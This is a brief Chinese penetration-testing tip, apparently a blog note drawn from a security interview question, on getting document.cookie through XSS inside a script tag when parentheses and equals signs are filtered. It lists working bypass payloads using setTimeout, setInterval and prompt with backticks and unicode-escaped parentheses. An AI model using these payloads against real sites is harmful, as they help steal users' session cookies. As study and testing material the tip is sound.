渗透Tips之XSS过滤括号等号情况下cookie的获取

别人的一个安全面试题，简单记录一下。

参数name直接已经放在了<script>标签里面：

那么直接alert(document.cookie)试一下：

可以看到括号已经做了处理，虽然可以使用反引号绕过括号过滤，但是反引号中的内容是处理字符串，并不能得到想要的结果，比如：

通过FUZZ，如下：

TIPS：

setTimeout`alert\u0028document.cookie\u0029`;

setInterval`alert\u0028document.cookie\u0029`;

　　

 

如果setTimeou可以，那么setInterval也可以使用，区别就是后者会根据设置的时间不断执行：

Tips:

prompt`${document.cookie}`

　　

当然还有其他方法，仅作为tips参考。